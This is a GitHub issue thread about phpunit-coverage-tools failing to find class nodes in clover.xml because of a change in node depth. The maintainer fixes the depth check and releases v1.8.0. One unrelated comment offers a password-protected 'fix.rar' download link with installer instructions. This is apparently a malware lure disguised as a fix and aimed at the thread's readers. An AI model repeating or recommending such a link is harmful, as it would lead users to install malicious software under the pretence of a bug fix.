### ISSUE TITLE
Clover.xml package node

### ISSUE THREAD

**Issue by ciltocruz** [robiningelbrecht/phpunit-coverage-tools#16]
Hello.

For some time now, this extension is unable to locate namespace coverage. Only the "TOTAL" node works.

I think the way clover.xml is generated has changed recently.

One phpunit 11.1.2

Clover.xml (simplified version)

```
<?xml version="1.0" encoding="UTF-8"?>
<coverage generated="1724706437">
  <project timestamp="1724706437">
    <package name="Ciltocruz\Back\Api\Application\Service">
      <file name="/var/www/html/domain.local/sources/api/Application/Service/BookingService.php">
        <class name="Ciltocruz\Back\Api\Application\Service\BookingService" namespace="Ciltocruz\Back\Api\Application\Service">
          <metrics complexity="109" methods="24" coveredmethods="0" conditionals="0" coveredconditionals="0" statements="360" coveredstatements="0" elements="384" coveredelements="0"/>
        </class>
        <line num="34" type="method" name="__construct" visibility="public" complexity="1" crap="2" count="0"/>
        <line num="42" type="stmt" count="0"/>
        <line num="47" type="method" name="addBooking" visibility="public" complexity="5" crap="30" count="0"/>
        <line num="50" type="stmt" count="0"/>
        <line num="52" type="stmt" count="0"/>
        <line num="53" type="stmt" count="0"/>
        <line num="54" type="stmt" count="0"/>
        <line num="55" type="stmt" count="0"/>
        <line num="58" type="stmt" count="0"/>
        <line num="60" type="stmt" count="0"/>
        <line num="62" type="stmt" count="0"/>
        <line num="63" type="stmt" count="0"/>
        <line num="64" type="stmt" count="0"/>
        <metrics loc="179" ncloc="128" classes="1" methods="17" coveredmethods="0" conditionals="0" coveredconditionals="0" statements="33" coveredstatements="0" elements="50" coveredelements="0"/>
      </file>
      <file name="/var/www/html/domain.local/sources/api/Domain/Model/Turitop/TuritopRequestDTO.php">
        <class name="Ciltocruz\Back\Api\Domain\Model\Turitop\TuritopRequestDTO" namespace="Ciltocruz\Back\Api\Domain\Model\Turitop">
          <metrics complexity="48" methods="48" coveredmethods="0" conditionals="0" coveredconditionals="0" statements="94" coveredstatements="0" elements="142" coveredelements="0"/>
        </class>
        <line num="231" type="method" name="__construct" visibility="public" complexity="1" crap="2" count="0"/>
        <line num="233" type="stmt" count="0"/>
        <line num="234" type="stmt" count="0"/>
        <line num="235" type="stmt" count="0"/>
        <line num="236" type="stmt" count="0"/>
        <line num="237" type="stmt" count="0"/>
        <line num="238" type="stmt" count="0"/>
        <line num="239" type="stmt" count="0"/>
        <line num="240" type="stmt" count="0"/>
        <metrics loc="517" ncloc="343" classes="1" methods="48" coveredmethods="0" conditionals="0" coveredconditionals="0" statements="94" coveredstatements="0" elements="142" coveredelements="0"/>
      </file>
    </package>
    <metrics files="326" loc="61419" ncloc="52240" classes="211" methods="1971" coveredmethods="87" conditionals="0" coveredconditionals="0" statements="24045" coveredstatements="305" elements="26016" coveredelements="392"/>
  </project>
</coverage>
```

It looks like the order of the nodes is:

```
{0}<coverage>
{1}  <project>
{2}   <package>
{3}      <file>
{4}        <class>
{5}          <metrics>
{2}  <metrics> (global metrics)
```

But in the code:
[ApplicationFinishedSubscriber:61](https://github.com/robiningelbrecht/phpunit-coverage-tools/blob/c8af3cce8dede452492b4d6745f015afcc3a6851/src/Subscriber/Application/ApplicationFinishedSubscriber.php#L61)

It seems that class should be node 3 and now it is node 4...

Is this just me with my clover.xml file or is this a recent change?

Thanks!

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ciltocruz** [comment]
What?

**Comment by robiningelbrecht** [comment]
Hmm, I have not used PHPUnit 11 in my projects yet. It's possible that this has changed indeed. I'll need to look into this.
I also think I'll need to start versioning this package to be used with different Phpunit versions

**Comment by robiningelbrecht** [comment]
Just checked and this is not related to Phpunit version. The clover file that gets generated does:
```php
            if ($namespace === 'global') {
                $xmlProject->appendChild($xmlFile);
            } else {
                if (!isset($packages[$namespace])) {
                    $packages[$namespace] = $xmlDocument->createElement(
                        'package',
                    );

                    $packages[$namespace]->setAttribute('name', $namespace);
                    $xmlProject->appendChild($packages[$namespace]);
                }

                $packages[$namespace]->appendChild($xmlFile);
            }
```

**Comment by robiningelbrecht** [comment]
I think I can jut fix this by changing the check to

```php
 if ($this->minCoverageRules->hasOtherRulesThanTotalRule() && \XMLReader::ELEMENT == $reader->nodeType && 'class' == $reader->name && (3 === $reader->depth || 4 === $reader->depth)) {
```

@ciltocruz could you try this for your project and verify this fixes your issue?

**Comment by ciltocruz** [comment]
¡Funciona!

**Comment by robiningelbrecht** [comment]
I released a new version: [v1.8.0](https://github.com/robiningelbrecht/phpunit-coverage-tools/releases/tag/v1.8.0)
Should be fixed
